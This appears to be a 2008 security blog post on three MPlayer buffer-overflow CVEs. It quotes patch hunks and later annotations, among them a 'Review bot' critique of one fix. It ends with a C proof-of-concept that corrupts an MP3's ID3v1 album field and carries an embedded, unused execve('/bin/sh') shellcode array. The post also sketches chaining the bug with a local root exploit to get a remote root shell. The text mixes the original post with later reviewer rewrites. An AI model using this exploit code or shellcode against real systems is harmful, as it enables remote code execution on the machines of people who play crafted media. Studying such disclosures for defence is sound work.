miércoles, febrero 13, 2008

MPlayer Security

MPlayer started 2008 the wrong way: three dangerous security flaws have been reported.

* CVE-2008-0486 — stack overflow at line 229 of demux_audio.c
Attack vector: .mov file header (as reported; note that the hunk below is the comment-block parser in demux_audio.c — `comment`, `comments`, `blk_len` — so the trigger there is a crafted comment length)

ptr += 4;
comment = ptr;
+ if (&comment[length] < comments ||
&comment[length] >= &comments[blk_len])
+ return;
c = comment[length];
comment[length] = 0;
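Review bot: The added check still forms `&comment[length]` before comparing it, so for the oversized `length` it is meant to reject the pointer is already out of range — undefined behaviour, and on a 32-bit build it can wrap below `comments` and satisfy both comparisons, letting `comment[length] = 0` write out of bounds anyway. Compare offsets instead: `size_t off = (size_t)(comment - comments);` then `if (off >= blk_len || length >= blk_len - off) return;`, which keeps both the read of `c` and the terminator write inside `comments[blk_len]`. The types of `length` and `blk_len` are not visible in the hunk; if `length` is signed it needs a negative check or a cast first. The `ptr += 4` advance above the check is not bounded in the lines shown, so it presumably relies on a check higher in the function, which starts and ends outside this hunk.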


* CVE-2008-0629 — buffer overflow in stream/ (file name truncated in the original)
Attack vector: album title

strncpy(album_title, ptr, len);
album_title[len-2]='\0';


The `-2` is wrong: `len` comes from the input, so with `len` below 2 the terminator is written before the start of `album_title`, and nothing in the lines shown bounds `len` against the size of `album_title` before the `strncpy`, so the copy itself can overflow too.


* CVE-2008-0630 — buffer overflow in url.c
Attack vector: an over-long URL leaves the copied string without its terminating `\0`

The most dangerous scenario: publish a disc with a crafted album name, and anyone who plays it with cddb:// lookups enabled gets arbitrary code execution (a reverse shell, for instance); chaining that with the then-current vmsplice local root exploit turns it into remote root.

Recommendation: the same as always — keep your software updated and audited!

Here is the PoC. It rewrites the album field of an MP3's trailing "TAG" block (ID3v1-style tag) with 90 bytes of 0x41:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Payload bytes.  Judging by the trailing 2f 62 69 6e 2f 73 68 ("/bin/sh")
 * and the two "cd 80" (int 0x80) sequences this looks like 32-bit Linux
 * execve("/bin/sh") shellcode in the usual jmp/call/pop form -- not
 * verified here.
 *
 * NOTE(review): this array is never referenced by main() below; the bytes
 * actually injected into the file are 0x41 filler only, so the listing as
 * shown never plants this payload.
 */
char sha0code[] =
"\xeb\x16\x5b\x31\xc0"
"\x50\x53\xb0\x0b\x89"
"\xdb\x89\xe1\x31\xd2"
"\xcd\x80\x31\xc0\x40"
"\x31\xdb\xcd\x80\xe8"
"\xe5\xff\xff\xff\x2f"
"\x62\x69\x6e\x2f\x73\x68";

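/*
 * Return -1 when the three bytes at ptr spell the "TAG" marker (the
 * ID3v1-style tag header the PoC looks for), 0 otherwise.  Callers treat
 * the non-zero value as "found".
 *
 * ptr must point at least 3 readable bytes; this function cannot verify
 * that, so the caller has to keep ptr + 3 inside its buffer.
 */
int checkIdent(const char *ptr) {
    return memcmp(ptr, "TAG", 3) == 0 ? -1 : 0;
}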

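/* Read exactly len bytes from fd into buf, resuming after short reads.
 * Returns 0 on success, -1 on a read error or premature end of file. */
static int read_exact(int fd, char *buf, size_t len) {
    size_t done = 0;
    while (done < len) {
        ssize_t got = read(fd, buf + done, len - done);
        if (got <= 0) {
            return -1; /* error, or the file shrank since we measured it */
        }
        done += (size_t)got;
    }
    return 0;
}

/* Write exactly len bytes from buf to fd, resuming after short writes.
 * Returns 0 on success, -1 on a write error. */
static int write_exact(int fd, const char *buf, size_t len) {
    size_t done = 0;
    while (done < len) {
        ssize_t put = write(fd, buf + done, len - done);
        if (put <= 0) {
            return -1;
        }
        done += (size_t)put;
    }
    return 0;
}

/*
 * PoC driver: open the MP3 named on the command line, locate the last "TAG"
 * marker (ID3v1-style tag: "TAG", title[30], artist[30], album[30], ...),
 * and overwrite the album field -- and, as in the original listing, the
 * bytes that follow it -- with 0x41 filler, so a player copying the album
 * title into a fixed-size buffer overruns it.
 *
 * WARNING: the file is modified in place; run this on a copy.
 *
 * Returns 0 on success and 1 on any usage, I/O or allocation failure.
 *
 * Fixes relative to the original listing:
 *  - every open/lseek/read/write/malloc result is checked, and a usage
 *    error now exits non-zero;
 *  - the tag search starts 3 bytes before the end instead of reading the
 *    marker window past the buffer;
 *  - album is only used when a marker was found and the field lies inside
 *    the file (it was an uninitialised pointer otherwise);
 *  - the 90-byte fill is clamped to the end of the buffer (with a standard
 *    128-byte trailing tag the unclamped memset ran 25 bytes past the heap
 *    allocation);
 *  - the album field is printed with an explicit width, since the tag
 *    fields are not necessarily NUL-terminated.
 */
int main(int argc, char **argv) {
    enum {
        MARKER_LEN   = 3,            /* "TAG" */
        ALBUM_OFFSET = 3 + 30 + 30,  /* marker + title[30] + artist[30] */
        ALBUM_FIELD  = 30,           /* width of the album field */
        PAYLOAD_LEN  = 90,           /* bytes of 0x41 written, as in the original */
        SEARCH_FLOOR = 100           /* the original scan stops at offset 100 */
    };
    int rc = 1;
    int fd = -1;
    char *mp3file = NULL;
    char *album = NULL;
    size_t bytes = 0;
    size_t fill = 0;

    if (argc != 2) {
        printf("USAGE: %s FileToInjectTheExploit.mp3\n", argv[0]);
        return 1;
    }

    fd = open(argv[1], O_RDWR);
    if (fd < 0) {
        perror(argv[1]);
        return 1;
    }

    /* Size the file, then slurp it whole -- the tag lives at the very end. */
    off_t end = lseek(fd, 0, SEEK_END);
    if (end < 0) {
        perror("lseek");
        goto out;
    }
    bytes = (size_t)end;
    if (bytes <= (size_t)SEARCH_FLOOR + MARKER_LEN) {
        fprintf(stderr, "%s: too small to hold a tag above offset %d\n",
                argv[1], SEARCH_FLOOR);
        goto out;
    }
    mp3file = malloc(bytes);
    if (mp3file == NULL) {
        perror("malloc");
        goto out;
    }
    if (lseek(fd, 0, SEEK_SET) < 0 || read_exact(fd, mp3file, bytes) < 0) {
        perror("read");
        goto out;
    }

    /* Scan backwards for the last "TAG" marker.  The 3-byte window must stay
     * inside the buffer, so the scan starts MARKER_LEN bytes before the end. */
    for (size_t i = bytes - MARKER_LEN; i > SEARCH_FLOOR; i--) {
        if (checkIdent(mp3file + i)) {
            if (i + ALBUM_OFFSET + ALBUM_FIELD <= bytes) {
                album = mp3file + i + ALBUM_OFFSET;
            }
            break; /* like the original: stop at the first match from the end */
        }
    }
    if (album == NULL) {
        fprintf(stderr, "%s: no usable TAG block found\n", argv[1]);
        goto out;
    }

    /* Explicit width: the field is padded, not necessarily NUL-terminated. */
    printf("Album:%.*s\n", ALBUM_FIELD, album);

    /* Fill with 'A's.  90 bytes is three times the album field and runs into
     * the tag fields after it (kept from the original); clamp so the write
     * never leaves our buffer. */
    fill = PAYLOAD_LEN;
    if (fill > bytes - (size_t)(album - mp3file)) {
        fill = bytes - (size_t)(album - mp3file);
    }
    memset(album, 0x41, fill);

    /* Write back only the bytes we changed. */
    if (lseek(fd, (off_t)(album - mp3file), SEEK_SET) < 0 ||
        write_exact(fd, album, fill) < 0) {
        perror("write");
        goto out;
    }
    rc = 0;

out:
    free(mp3file);
    if (fd >= 0 && close(fd) < 0 && rc == 0) {
        perror("close");
        rc = 1;
    }
    return rc;
}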